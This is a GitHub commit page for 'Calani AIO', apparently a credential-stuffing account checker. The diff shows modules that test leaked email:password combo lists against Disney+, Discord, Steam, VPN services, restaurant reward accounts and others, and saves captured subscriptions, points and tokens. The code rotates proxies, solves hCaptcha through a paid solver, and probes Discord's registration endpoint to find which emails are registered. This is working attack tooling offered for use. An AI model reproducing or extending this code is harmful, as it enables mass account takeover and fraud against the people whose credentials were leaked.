Skip to content
This repository has been archived by the owner on Feb 23, 2024. It is now read-only.

Commit

Permalink
v1.0.2
Browse files Browse the repository at this point in the history
Improved Speed
Disney Module Updated
Other Modules Experienced A Slight Speed Increase
Removed Unused Imports
Decreased Time Taken To Chose Proxies/Combos
Checker Now Shows Path To Folder Where Hits etc Were Saved
New Lock Methods Implemented Resulting In Less Lag
Now Using The Colored Module For Color Management
Cui Style Changed
Updated CPM Counter Method
  • Loading branch information
Mickey758 committed Oct 8, 2022
1 parent 2f05580 commit 55d4c02
Show file tree
Hide file tree
Showing 39 changed files with 431 additions and 365 deletions.
1 change: 1 addition & 0 deletions .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,7 @@ binary
!SOURCES.txt
!top_level.txt
!dependency_links.txt
test.*

# Byte-compiled / optimized / DLL files
__pycache__/
Expand Down
37 changes: 18 additions & 19 deletions MODULES.md
Original file line number Diff line number Diff line change
@@ -1,26 +1,25 @@
# Modules List
### 24 Total Modules
- Disney+ [Full Capture]
- PlexTV [Subscription Capture]
- Duolingo [Full Capture]
### 23 Total Modules
- Bww [Points Capture | Proxyless]
- Dominos [Points Capture | Recaptcha V3 Bypass]
- Dickeys [Points Capture]
- Honeygain [Credits Capture]
- Yahoo [Brute]
- Discord [Token Capture | Solver]
- Instagram [Followers Capture]
- Disney+ [Full Capture]
- Duolingo [Full Capture]
- Gfuel [Full Capture]
- Crunchyroll [Subscription Capture]
- Spotify [Valid Mail]
- Buffalo Wild Wings [Points Capture]
- Dominos [Points Capture]
- Dickeys [Points Capture]
- Pornhub [Subscription Capture]
- Honeygain [Credits Capture]
- Yahoo [Brute]
- Discord [Token Capture]
- Discord [Valid Mail]
- Instagram [Followers Capture]
- Bonk.io [Full Capture]
- Bonk.Io [Full Capture]
- Uplay [Full Capture]
- Origin [Full Capture]
- Steam [Full Capture]
- Paramount [Full Capture]
- NordVPN [Subscription Capture]
- Plextv [Subscription Capture]
- Crunchyroll [Subscription Capture]
- Pornhub [Subscription Capture]
- Nordvpn [Subscription Capture]
- Windscribe [Subscription Capture]
- IPVanish [Subscription Capture]
- TunnelBear [Subscription Capture]
- Ipvanish [Subscription Capture]
- Tunnelbear [Subscription Capture]
- Hotspot Shield [Subscription Capture]
5 changes: 5 additions & 0 deletions anycaptcha-python-main/anycaptcha.egg-info/PKG-INFO
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
Metadata-Version: 2.1
Name: anycaptcha
Version: 1.0
Author: anycaptcha
Author-email: anycaptcha@support.com
2 changes: 1 addition & 1 deletion anycaptcha-python-main/anycaptcha/base.py
Original file line number Diff line number Diff line change
Expand Up @@ -209,7 +209,7 @@ def getBalance(self):
urljoin(self.base_url, self.BALANCE_URL), json=request
).json()
self._check_response(response)
return response["balance"]
return response.get("balance",False)

def getAppStats(self, soft_id, mode):
request = {"clientKey": self.client_key, "softId": soft_id, "mode": mode}
Expand Down
36 changes: 22 additions & 14 deletions main.py
Original file line number Diff line number Diff line change
@@ -1,7 +1,6 @@
from colorama import init
from time import sleep
from modules.updater import check as check_updates
from modules.variables import Checker, discord
from modules.variables import Checker, discord_name
from modules.config import *
from modules.functions import *
from modules.start import starter,modules_list
Expand All @@ -14,7 +13,7 @@

def home():
while 1:
change_title(f"Calani AIO | Home | {discord}")
change_title(f"Calani AIO | Home | {discord_name}")
clear()
ascii()
print("\n\n")
Expand All @@ -39,27 +38,34 @@ def info():
ascii()
print("\n\n")
print(f" [{cyan}Info{reset}]\n")
print(f""" [{cyan}>{reset}] Created By: {discord}
print(f""" [{cyan}>{reset}] Created By: {discord_name}
[{cyan}>{reset}] Wanna Make A Donation?
BTC: bc1qt6gcll4hp7wwqaap7x3lwunf9srw4enuxxddzn
ETH: 0xd7F5C1AB4765Be15F738367905bF4E7Ea83eC9F7
LTC: LdsjBD8ACvqUinrgbJJvCcELs2AxN5NSpc
[{cyan}>{reset}] If you payed for this application, you were SCAMMED!
[{cyan}>{reset}] If you paid for this application, you were SCAMMED!
Press Enter To Go Back""",end="")
input()

def modules():
selected_modules = []
if Checker.api_key:
balance = get_solver_balance()
while 1:
change_title(f"Calani AIO | Modules | {discord}")
change_title(f"Calani AIO | Modules | {discord_name}")
clear()
ascii()
print("\n\n")
print(f" [{cyan}Modules{reset}]\n")

disabled = []
for module in modules_list:
if module in selected_modules and module.split(' ')[0] in ['discord']:
if not balance or 'Invalid' in balance:
selected_modules.remove(module)
disabled.append(module.split(' ')[0])
index = list(modules_list).index(module)+1
selected = f"{cyan}+{reset}" if module in selected_modules else " "
print(f" [{selected}] [{cyan}{index}{reset}] {module.title()}")
Expand All @@ -74,6 +80,9 @@ def modules():
[{cyan}S{reset}] Start Checking
[{cyan}X{reset}] Back""")
if disabled:
disabled = "\n".join([module for module in disabled])
message_box('Modules Disabled',f'The following modules were disabled because the api key was invalid or the solver setting was disabled.\n\n{disabled.title()}',0)

option = input(f" [{cyan}>{reset}] ").lower()
if option.isdigit():
Expand All @@ -100,7 +109,7 @@ def modules():


case "a":
if len(selected_modules) == len(modules_list):
if selected_modules:
selected_modules.clear()
continue
for module in modules_list:
Expand All @@ -111,7 +120,7 @@ def modules():
def settings():
while 1:
load_config()
change_title(f"Calani AIO | Settings | {discord}")
change_title(f"Calani AIO | Settings | {discord_name}")
clear()
ascii()
if Checker.api_key:
Expand Down Expand Up @@ -149,7 +158,7 @@ def settings():
def tools():
while 1:
load_config()
change_title(f"Calani AIO | Tools | {discord}")
change_title(f"Calani AIO | Tools | {discord_name}")
clear()
ascii()
print("\n\n")
Expand All @@ -166,19 +175,18 @@ def tools():
match option:
case "1": proxy_check.start()
case "2": proxy_scrape.start()
case "3": change_title(f"Calani AIO | Capture Remover | {discord}");captureremover.start()
case "4": change_title(f"Calani AIO | Combo Editor | {discord}");combo_edit.start()
case "5": change_title(f"Calani AIO | Domain Sorter | {discord}");domain_sort.start()
case "3": change_title(f"Calani AIO | Capture Remover | {discord_name}");captureremover.start()
case "4": change_title(f"Calani AIO | Combo Editor | {discord_name}");combo_edit.start()
case "5": change_title(f"Calani AIO | Domain Sorter | {discord_name}");domain_sort.start()
case "x": return

if __name__ == "__main__":
init(autoreset=True)
win32api.SetConsoleCtrlHandler(save_lines, True)
load_config()
clear()
ascii()
print("\n\n")
message_box('Creator Info',f'Discord: {discord}\nCracked.io: MickeyYe\nGithub: Mickey758\n\nReport Bugs / Request Modules',0)
message_box('Creator Info',f'Discord: {discord_name}\nCracked.io: MickeyYe\nGithub: Mickey758\n\nReport Bugs / Request Modules',0)
need_update = check_updates()
if not need_update: home()
print(f" [{red}>{reset}] Your version is outdated!")
Expand Down
6 changes: 2 additions & 4 deletions modules/checkers/base.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,3 @@
from time import sleep
from modules.variables import Checker
from modules.functions import bad_proxy, log, save, set_proxy, return_proxy
from requests import Session
Expand Down Expand Up @@ -35,11 +34,10 @@ def check(email:str,password:str):
# save("NAME","custom",Checker.time,":".join([email,password]))
# Checker.custom += 1
# return_proxy(proxy)
# return


except:
bad_proxy(proxy)
return_proxy(proxy)
Checker.errors += 1

sleep(0.1)
Checker.errors += 1
5 changes: 4 additions & 1 deletion modules/checkers/bonk_io.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
from pyautogui import sleep
from modules.variables import Checker
from modules.functions import set_proxy,log,save,bad_proxy, return_proxy
from requests import Session
Expand Down Expand Up @@ -50,4 +51,6 @@ def check(email:str,password:str):
bad_proxy(proxy)
return_proxy(proxy)
Checker.errors += 1
continue
continue


3 changes: 1 addition & 2 deletions modules/checkers/bww.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,3 @@
from time import sleep
from modules.variables import Checker
from requests import Session
from modules.functions import log,save
Expand Down Expand Up @@ -64,4 +63,4 @@ def check(email:str,password:str):
except:
Checker.errors += 1

sleep(0.1)

4 changes: 1 addition & 3 deletions modules/checkers/crunchyroll.py
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,6 @@
from modules.functions import log,save,set_proxy,bad_proxy, return_proxy
from requests.adapters import HTTPAdapter, Retry
from uuid import uuid4
from time import sleep
from urllib.parse import quote
import functools

def check(email:str,password:str):
Expand Down Expand Up @@ -56,4 +54,4 @@ def check(email:str,password:str):
return_proxy(proxy)
Checker.errors += 1

sleep(0.1)

3 changes: 1 addition & 2 deletions modules/checkers/dickeys.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,3 @@
from time import sleep
from modules.variables import Checker
from modules.functions import bad_proxy, log, save, set_proxy, return_proxy
from requests import Session
Expand Down Expand Up @@ -48,4 +47,4 @@ def check(email:str,password:str):
return_proxy(proxy)
Checker.errors += 1

sleep(0.1)

Original file line number Diff line number Diff line change
Expand Up @@ -2,8 +2,10 @@
from requests import Session
from modules.functions import bad_proxy, log,save,set_proxy, return_proxy
from requests.adapters import HTTPAdapter, Retry
import functools
from modules.functions import get_captcha
from string import ascii_letters as l, digits as d
from random import choices
import functools

def check(email:str,password:str):
while 1:
Expand All @@ -18,6 +20,15 @@ def check(email:str,password:str):
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))

payload = {"fingerprint":"793580565130641419.LGQ5IVlIkNTEQfpHbXcQLA2ABrM","email":email,"username":"".join(choices(l+d,k=6)),"password":"rth21e98!fmPP","invite":None,"consent":True,"date_of_birth":"1993-05-03","gift_code_sku_id":None,"captcha_key":None}
r = s.post("https://discord.com/api/v8/auth/register",json=payload).text
if "EMAIL_TYPE_INVALID_EMA" in r or "token" in r or "captcha-required" in r:
Checker.bad += 1
return_proxy(proxy)
return
elif "EMAIL_ALREADY_REGISTERED" not in r:
raise

solution = get_captcha('f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34','https://discord.com/','hcaptcha')
payload = {"login": email, "password": password, "undelete": "false", "captcha_key": solution,"login_source": None, "gift_code_sku_id": None}
headers = {"Content-Type": "application/json", "accept": "*/*", "accept-language": "en-US","authorization": "undefined", "referer": "https://discord.com/login","user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36","x-context-properties": "eyJsb2NhdGlvbiI6IkxvZ2luIn0=","x-debug-options": "bugReporterEnabled"}
Expand Down
39 changes: 0 additions & 39 deletions modules/checkers/discordvm.py

This file was deleted.

Loading

0 comments on commit 55d4c02

Please sign in to comment.